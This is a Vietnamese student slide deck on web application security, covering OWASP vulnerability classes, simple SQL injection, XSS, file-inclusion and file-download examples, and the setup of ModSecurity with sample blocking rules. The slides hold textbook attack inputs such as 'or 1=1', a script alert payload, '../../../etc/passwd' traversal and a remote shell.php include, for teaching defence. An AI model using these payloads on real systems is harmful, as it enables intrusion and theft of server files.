30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
 
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...
ĐỀ KIỂM TRA CUỐI KÌ 2 BIÊN SOẠN THEO ĐỊNH HƯỚNG ĐỀ BGD 2025 MÔN TOÁN 10 - CÁN...
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hành
 
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
26 Truyện Ngắn Sơn Nam (Sơn Nam) thuviensach.vn.pdf
 
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdfGiáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf
Giáo trình xây dựng thực đơn. Ths Hoang Ngoc Hien.pdf
 
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdfSLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
 
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...
TUYỂN TẬP ĐỀ THI GIỮA KÌ, CUỐI KÌ 2 MÔN VẬT LÍ LỚP 11 THEO HÌNH THỨC THI MỚI ...
 
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoiC6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
C6. Van de dan toc va ton giao ....pdf . Chu nghia xa hoi
 
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...
20 ĐỀ DỰ ĐOÁN - PHÁT TRIỂN ĐỀ MINH HỌA BGD KỲ THI TỐT NGHIỆP THPT NĂM 2024 MÔ...
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
 
Bài học phòng cháy chữa cháy - PCCC tại tòa nhà
Bài học phòng cháy chữa cháy - PCCC tại tòa nhàBài học phòng cháy chữa cháy - PCCC tại tòa nhà
Bài học phòng cháy chữa cháy - PCCC tại tòa nhà
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docxbài thi bảo vệ nền tảng tư tưởng của Đảng.docx
bài thi bảo vệ nền tảng tư tưởng của Đảng.docx
 
các nội dung phòng chống xâm hại tình dục ở trẻ em
các nội dung phòng chống xâm hại tình dục ở trẻ emcác nội dung phòng chống xâm hại tình dục ở trẻ em
các nội dung phòng chống xâm hại tình dục ở trẻ em
 
Access: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.pptAccess: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.ppt
 
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdfxemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
xemsomenh.com-Vòng Thái Tuế và Ý Nghĩa Các Sao Tại Cung Mệnh.pdf
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
 
Giáo trình nhập môn lập trình - Đặng Bình Phương
Giáo trình nhập môn lập trình - Đặng Bình PhươngGiáo trình nhập môn lập trình - Đặng Bình Phương
Giáo trình nhập môn lập trình - Đặng Bình Phương
 

Web application-security

  • 1. WEB APPLICATION SECURITY Author: Nguyễn Trường Phú – Nguyễn Tuấn Anh Date: 1-5-2015
  • 2. ABOUT AUTHOR • Name: Nguyễn Tuấn Anh Nguyễn Trường Phú • Class: 23CCAN04 • Unit: An toàn ứng dụng
  • 3. CONTENT 1. Web application attack and defense 2. Modsecurity (mod_sec)
  • 5. Web Application Security Nền tảng Website phổ biến: • Apache (httpd) • Nginx • IIS • Apache Tomcat • PHP • ASPX (ASP.NET) • JSP + Servlet (JAVA) • HTML + CSS / HTML5 + CSS3 • Javascript / Jquery Client – Side Server - Side • MySQL • MariaDB • MongoDB • MemSQL • Access • SQLserver • MSSQL • …….. + + Web services: Databases:Languages:
  • 6. Web Application Security 1 Website có thể bị tấn công như thế nào? • Thông qua Authencation (Các hình thức tấn công vào mật khẩu, giao thức mã hoá, hình thức chứng thực,…) • Thông qua Session, Transport,…. (Các hình thức tấn công qua bảo mật đường truyền bao gồm cả MITM) • Thông qua Lổ hổng Web Application • Thông qua Lổ hổng OS (Đặc biệt nhiều đối với Windows và khá ít đối với Linux) • Thông qua Server Application/Software (Lổ hổng các service/software khác trên server: Mail, browser,adobe,java,…) • Thông qua Mã độc hoặc Backdoor được thiết lập từ trước • Thông qua các hình thức tấn công từ chối dịch vụ (DoS, DDoS, DRDoS, Spam, …..) • Thông qua Crawler hoặc các kẻ hở trong configure và quản lý (lổ hổng phân quyền, lộ tập tin, đường dẫn nhạy cảm,… • Thông qua Tấn công vật lý • Thông qua tâm lý con người (Social)
  • 7. Web Application Security Lổ hổng Web Application 1. Injection (SQLi, LDAPi, OS command injection,…) 2. Cross Site Scripting (XSS) 3. Broken Authentication and Session Management (Nguy cơ về quản lý phiên/session) 4. Insecure Direct Object References (Các lổ hổng trong tham chiếu) 5. Cross Site Request Forgery (CSRF) 6. Security Misconfiguration (Lổ hổng trong cấu hình, triển khai dịch vụ web,…) 7. Insecure Cryptographic Storage (Lổ hổng trong mã hoá dữ liệu nhạy cảm) 8. Failure to Restrict URL Access (Các lổ hổng quyền hạn truy cập url nhạy cảm) 9. Insufficient Transport Layer Protection (Lổ hổng đường truyền) 10. Unvalidated Redirects and Forwards (Các lổ hổng chuyển hướng) 10 quy chuẩn bảo mật và cũng là 10 phân nhóm lỗ hổng bảo mật ứng dụng web theo OWASP 2010.
  • 8. Web Application Security Ví dụ về 1 số hình thức tấn công Web Application phổ biến: • SQL injection (SQLi) • Cross Site Scripting (XSS) • Local File Inclusion (LFI) • Remote File Inclusion (RFI) • Local File Discluse/Download (LFD) • …..
  • 9. Web Application Security Định nghĩa: 1. SQL injection SQL injection (SQLi) là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp
  • 10. Web Application Security Ví dụ: 1. SQL injection Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl  Câu truy vấn CSDL có dạng: “SELECT * FROM chuyenmuc WHERE tenchuyenmuc =“ + $page Trong đó có thể $page=$_GET(‘tenpage’) Attacker cố tình truy vấn trên URL: http://ceh.vn /index.php?page=SQl or 1=1  Câu truy vấn CSDL có dạng: SELECT * FROM chuyenmuc WHERE tenchuyenmuc=SQl or 1=1 Ta thấy vì 1=1 luôn đúng nên truy vấn trả lại tất cả những thông tin có trong bảng chuyenmuc  Thông tin bị khai thác => Lỗi. Attacker có thể thực hiện truy vấn phức tạp hơn, truy vấn các cột, trường, thông tin quan trọng hơn.
  • 11. Web Application Security Định nghĩa: 2. XSS XSS xuất hiện khi một ứng dụng web cho phép người dùng nhập các dữ liệu vào mà không thông qua kiểm duyệt nội dung, những dữ liệu này sẽ tương tác trực tiếp với những người dùng khác cùng sử dụng website. Nguy cơ tạo ra là hacker có thể chèn các mã kịch bản như HTML, Javascript… (client side) nhằm ăn cắp SessionCookie, thay đổi giao diện (deface) hoặc chuyển hướng đến trang có mã độc khác.
  • 13. Web Application Security Ví dụ: 2. XSS if(!empty($_GET['name'])) { $name=$_GET['name']; print $name; } else { Code lây $name trực tiếp từ giá trị khung name và in ra thẳng: Khi attacker không truy vấn bình thường mà inject mã javascript vào khung name  Truyền giá trị trực tiếp cho biến name: <script>alert(“Crazykid”)</script> Lúc này được javascript được gán cho biến name và in ra Như một câu lệnh chứ không phải là 1 truy vấn bình thường  đoạn javascript độc hại của attacker được thực thi
  • 14. Web Application Security Định nghĩa: 3. LFI Lỗ hổng cho phép các attacker có thể truy vấn các tập tin nhạy cảm trên web server và đọc được Nội dung các tập tin đó. Ví dụ các tập tin nhạy cảm: /etc/passwd, /etc/shadow, httpd.conf,……
  • 15. Web Application Security Ví dụ: 3. LFI Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl  Nếu code trang view có dạng: <?php $Bien=$_GET[‘page’]; Include $Bien; ?> Attacker cố tình truy vấn trên URL: http://ceh.vn /index.php?page=../../../etc/passwd  Lúc này trở thành giống như là ta code như sau: <?php $Bien=$_GET[‘page’]; Include ../../../etc/passwd; ?>  Attacker có thể đọc được nội dung của tập tin passwd trong đường dẫn ../../etc/ trên server ngay chính tại trang view. Chú ý ../ là chuyển lên một thư mục trong Linux. Nếu server windows thì dung ..  URL lencode = %5C
  • 16. Web Application Security Định nghĩa: 3. RFI Cho phép attack gọi đến một file trên web server hoặc trên server khác ngay tại web server này. Ví dụ: http://ceh.vn/page?=http://www.vietnamnet.vn Nếu ceh.vn bị lỗi RFI thì nội dung trang vietnamnet.vn sẽ hiển hị trên ceh.vn Nếu attacker đặt backdoor trên vietnamnet.vn dạng: http://www.vietnamnet.vn/shell.php Tại ceh.vn attacker truy vấn: http://ceh.vn/page?=www.vietnamnet.vn/shell.php Thì nội dung backdoor shell.php sẽ được include vào source code của ceh.vn  ta cắm backdoor trưc tiếp trên ceh.vn
  • 17. Web Application Security Ví dụ: 3. RFI Code: <?php $test=$_GET['test']; include $test.'id=1'; ?> Và register_globals = off http://xx.xx.xx.xx/CEH/RFI/3test.php?test=http://ceh.vn/shell.txt Input: Out:
  • 18. Web Application Security Định nghĩa: 3. LFD Giống LFI nhưng thay vì attacker có thể đọc các file nhạy cảm thì ở đây attacker có thể Download các file nhạy cảm về máy
  • 19. Web Application Security Ví dụ: 3. LFD Đoạn code sau: <?php $test=$_GET['test']; readfile($test); ?> Hàm readfile() cho phép chúng ta đọc code file được truyền vào . http://ceh.vn/CEH/3LFD/1lfd.php?test=/etc/passwd
  • 20. Web Application Security Phát hiện, kiểm tra các lổ hổng Web Application: • Ở vị trí attacker tấn công Opensource hoặc ở vị trị quản trị/chuyên gia an ninh kiểm thử Whitehat: Đọc source code, Debug Source code tìm lổ hổng. • Tấn công CloseSource, Đa số, kiểm thử Blackbox:  Sử dụng phương pháp thủ công Phương pháp Fuzzer vào các input (Nhập vào chuỗi ký tự ngẫu nhiên hoặc có mục địch nhằm xác định lổ hổng) Ví dụ: Thêm vào URL, khung Search, Login,… các câu truy vấn, thay đổi method, tiêm vô số ký tự,…  Sử dụng phương pháp tự động Sử dụng các công cụ Scan, tìm kiếm lổ hổng Ví dụ: OpenSource: W3AF, Paros (Andiparos và Zed attack Proxy), Skipfish, Grabber, Zero Day Scan,… CloseSource: Acunetix, N-stalker, NeXpose, Retina, AppScan, ParosPro, ….
  • 21. Web Application Security Giải pháp Web Application Security: • An Toàn Source code: Fix lổ hổng trong source code. Đưa ra 1 số hàm lọc, Security phù hợp • Authencation: Áp dụng các hình thức mã hoá, chứng thực phù hợp (Kể cả mã hoá đường truyền (SSL, TLS,…)) • Đảm bảo toàn vẹn dữ liệu • Permission: Phân quyền tập tin source code web, tập tin quan trọng server, quản trị web,…phù hợp • Nâng cao kiến thức quản trị viên, tâm lý con người. • Thủ thuật riêng (Tuỳ kinh nghiệm mỗi quản trị viên): Giả lập patch web home, Giấu Configure file, tạo bẫy (honeypot), thiết lập php.ini phù hợp, lợi dụng mod rewirte, …….. • Sử dụng Web Application Firewall
  • 22. Web Application Security Tại sao cần Web Application Firewall? Nếu 1 Server chứa hàng trăm website  Việc Fix code từng website sẽ gây tốn kém tiền bạc, thời gian, Vô tình bỏ sót lổ hổng hoặc tạo phản ứng ngược nếu đội ngũ Fix Code trình độ yếu, cần một lớp gia cố Chắn chắn bên ngoài Web Application Firewall: Nhanh, Tiết kiệm chi phí, công sức, hiệu quả lớn, nhiều tính năng mở rộng, Quản trị tập trung, …. Và còn nhiều lợi ích khác
  • 23. Web Application Security Tại sao dùng Web Application khi có Firewall thông thường? Bởi vì ta cần những thứ firewall thông thường không có hoặc không được thiết kế với mục đích: Hoạt động và bảo vệ mạnh mẽ Layer 7, chống các cuộc tấn công layer 7. Phân tích, lọc, kiểm duyệt, thậm chí sửa đổi mạnh mẽ không chỉ header mà còn cả Request body, Request Response, được thiết kế để phù hợp với từng ứng dụng web, từng hệ thống web, Buffer các request/response để đảm bảo phân tích toàn diện vào bảo vệ tốt ứng dụng trong thời gian Thực Một số sản phẩm WAF cung cấp nhiều tính năng mở rộng như: Kiểm soát Cookies, Fake port, Fake Comment, Fake Compoment, …….
  • 24. Web Application Security Sơ đồ triển khai hệ thống đề nghị (Chỉ đối với 1 hệ thống Web server) Web Server Database Server Reverse Proxy ----- WAF (mod_sec) User Chú ý: WAF (Trong bài này là Mod_sec) và các luật chính của firewall tầng dưới sẽ triển khai tại Reverse Proxy. 1 Reverse Proxy có thể triển khai với nhiều Web Server. Tuỳ nhu cầu và điều kiện + Độ quan trọng Của DB mà triển khai Database riêng như mô hình hay để DB ngay tại Webserver còn Database triển Khai như một Server AD Backup hoặc gỡ bỏ để tiết kiệm chi phí.
  • 25. Web Application Security Một vài thắc mắc: Tại sao triển khai WAF trên Reverse Proxy?  Để bảo toàn Web Server và các Server bên trong khi cuộc tấn công nặng nề. Attacker tiếp xúc trực Tiếp với reverse proxy.  Giảm thiểu tài nguyên tiêu tốn cho Web server vì các WAF cần 1 lượng tài nguyên không nhỏ.  WAF cũng có thể kiểm soát tài nguyên tĩnh được Caching trên Reverse Proxy (HTML, CSS,…) Một số lời khuyên: Triển khai Reverse proxy với Nginx hoặc Apache (khuyên dùng Nginx vì độ chịu tải và caching) Có thể sử dụng Linux cho các server, Nếu sử dụng Linux cho các Server thì khuyên dùng firewall Application: modsecurity và Firewall tầng dưới dùng Iptables, lý do: Free, Mạnh mẽ, tuỳ biến mạnh, Modsecurity và Iptables có thể kết hợp với nhau hoàn hảo, Modsecurity có thể ra lệnh cho iptables Thực hiện các action khi cần thiết thông qua module hỗ trợ.
  • 27. Web Application Security Modsecurity Modsecurity (mod_Sec) là gì? • Một Web Application Firewall (WAF) • Được triển khai như là một Module của các web service • Opensource, Có thể mở rộng và miễn phí chỉ trả tiền nếu muốn có dịch vụ hỗ trợ
  • 28. Web Application Security Modsecurity Hoạt động ra sao? Kiểm soát chặt chẽ hoạt động của web server trên layer 7. Ghi log. Hành động theo luật Web Response Body Request Header Response Header Logging Request Body
  • 29. Web Application Security Modsecurity Hoạt động ra sao? Modsecurity có thể kiểm soát request và reponse trong cả header và body, nếu phát hiện các dấu Hiệu tấn công theo rules, Mod_sec sẽ thực hiện hoạt động đã được định sẵn theo từng Rules và ghi Logs lại các hành động đó Ví dụ: Phát triện trong Url truy vấn có ký tự () thì lập tức DROP. Ngoài ra Mod_sec còn có thể tạo hoặc chỉnh sửa các Request và Reponse.
  • 30. Web Application Security Modsecurity Triển khai Mod_sec (thực hiện triển khai trên Server Centos, Web service: apache) Yêu cầu: • Apache 2.2x hoặc các phiên bản sau • Libapr và Libapr-util • Libpcre • Liblua v1.5x hoặc các phiên bản sau này • Module Mod_unique_id của apache phải được bật
  • 31. Web Application Security Modsecurity Triển khai Mod_sec (thực hiện triển khai trên Server Centos, Web service: apache) Cài đặt • Download source Mod_sec tại trang chủ • Tạm dừng Apache • Biên dịch và cài đặt Mod_sec • Load module mod_sec trong file cấu hình apache Lưu ý: trước khi biên dịch hãy cài trình biên dịch. Đối với Centos: yum groupinstall “Development Tools”
  • 32. Web Application Security Modsecurity Triển khai Mod_sec (thực hiện triển khai trên Server Centos, Web service: apache) Tạo tập tin config mod_sec ví dụ modsec.conf và include tập tin này trong file cấu hình apache Tạo tập tin chứa rules cho Mod_sec ví dụ rulesmod.conf Trong tập tin modsec.conf ta gõ: <IfModule mod_security2.c> SecRuleEngine On SeDefaultAction “phase:1,deny,log,status:406,id:60008” Include “/etc/httpd/conf.d/rulesmod.conf” </IfModule> Khởi động Apache. Sẽ giải thích rõ từng dòng khi Demo.
  • 33. Web Application Security Modsecurity Triển khai Mod_sec (thực hiện triển khai trên Server Centos, Web service: apache) Tạo tập tin config mod_sec ví dụ modsec.conf và include tập tin này trong file cấu hình apache Tạo tập tin chứa rules cho Mod_sec ví dụ rulesmod.conf Trong tập tin modsec.conf ta gõ: <IfModule mod_security2.c> SecRuleEngine On SeDefaultAction “phase:1,deny,log,status:406,id:60008” Include “/etc/httpd/conf.d/rulesmod.conf” </IfModule> Khởi động Apache. Sẽ giải thích rõ chức năng từng dòng khi Demo.
  • 34. Web Application Security Modsecurity Lỗi thường gặp khi cài mod_sec và giải pháp (thực hiện triển khai trên Server Centos, Web service: apache) mlogc.c:32:23: error: curl/curl.h: No such file or directory mlogc.c:2232: error: âCURL_GLOBAL_ALLâ undeclared (first use in this function) make[2]: *** [mlogc-mlogc.o] Error 1 make[2]: Leaving directory `/usr/src/modsecurity- apache_2.6.0/mlogc' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/usr/src/modsecurity- apache_2.6.0' make: *** [all] Error 2 Giải pháp: Cài curl và curl-devel sử dụng lệnh: yum install curl* Sau khi cài xong, xoá Makefile và biên dịch lại.
  • 35. Web Application Security Modsecurity Cấu trúc Rules Mod_sec (thực hiện triển khai trên Server Centos, Web service: apache) SecRule VARIABLES OPERATOR [ACTIONS] VARIABLE: (WHERE?) Vị trí So sánh OPERATOR : (HOW?) Dấu hiệu căn cứ để so sánh [ACTIONS]: (WHAT?) Xử lý ra sao Trong đó:
  • 36. Web Application Security Modsecurity Ví dụ: (thực hiện triển khai trên Server Centos, Web service: apache) SecRule ARGS kid SecRule ARGS|REQUEST_HEADERS:User-Agent kid SecRule HTTP_Referer “www.google.com” SecRule ARGS "unions+select" "deny,msg:'SQL Injection'" SecRule ARGS "unions+alls+select" "deny,msg:'SQL Injection'" SecRule ARGS "drops+table" "deny,msg:'SQL Injection'" SecRule ARGS "selects+*" "deny,msg:'SQL " Sẽ giải thích từng dòng rules khi Demo
  • 37. Web Application Security Modsecurity Các thành phân trong rule mod_sec: (thực hiện triển khai trên Server Centos, Web service: apache) VARIABLE: (WHERE?) Vị trí So sánh
  • 38. Web Application Security Modsecurity Các thành phân trong rule mod_sec: (thực hiện triển khai trên Server Centos, Web service: apache) OPERATOR : (HOW?) Dấu hiệu căn cứ để so sánh • So sánh theo chuỗi thường • So sánh theo toán tử Ví dụ so sánh toán tử: SecRule ARGS "!@rx ^CrazyKid$"
  • 39. Web Application Security Modsecurity Các thành phân trong rule mod_sec: (thực hiện triển khai trên Server Centos, Web service: apache) ModSecurity hỗ trợ 4 nhóm OPERATOR: • String–matching operators //so khớp string dùng toán tử • Numerical operators // So sánh số • Validation operators // Một vài toán tử đặc biệt so sánh các giá trị đặc biệt (XML, UTF-8,…) • Miscellaneous operators // Các toán tử lọc. Dùng so sánh lộ thông tin CC, lộ thông tin người dùng,….
  • 40. Web Application Security Modsecurity Các thành phân trong rule mod_sec: (thực hiện triển khai trên Server Centos, Web service: apache) [ACTIONS]: (WHAT?) Xử lý ra sao ModSecurity chia các action thành 7 phân mục: • Disruptive actions • Flow actions • Metadata actions • Variable actions • Logging actions • Special actions • Miscellaneous Actions
  • 41. Web Application Security Modsecurity Các thành phân trong rule mod_sec: (thực hiện triển khai trên Server Centos, Web service: apache) Ví dụ Disruptive actions: - Nếu xử lý khi so khớp thông tin = True thì thực hiện: + Allow (cho phép) +Block (khoá) +Deny (chặn và gửi phản hồi) +pass (cho qua luật tiếp theo) +Drop (Loại bỏ và không phản hồi) +Pause (Tạm dừng) …..
  • 42. Web Application Security Modsecurity Câu hỏi đặt ra: Các quản trị viên không am hiểu Rules mod_sec có thể triển khai mod_sec một cách an toàn không? Giải pháp trong trường hợp này: CORE RULE SET (CRS) Hạn chế: Core rules set là tập hợp rules được viết cho đại đa số người dùng chứ không phải một Hệ thống cụ thể nào  Tính tuỳ biến, linh hoạt và bảo mật không đảm bảo bằng tự thiết kế rules
  • 43. Web Application Security Modsecurity Một số tính năng mở rộng khác của Modsecurity Fake port:
  • 44. Web Application Security Modsecurity Một số tính năng mở rộng khác của Modsecurity Fake robots.txt Disallow Entries
  • 45. Web Application Security Modsecurity Một số tính năng mở rộng khác của Modsecurity Fake hidden form fields
  • 46. Web Application Security Modsecurity Một số tính năng mở rộng khác của Modsecurity Làm chậm các công cụ scan lổ hổng tự động
  • 48. Web Application Security Modsecurity Giải pháp Gui logs cho Modsecurity Một số giải pháp nguồn mở Cho việc monitor mod_sec Bằng giao diện đồ hoạ: Ví dụ: WAF-FLE
  • 49. Web Application Security Modsecurity Và còn rất nhiều tính năng khác……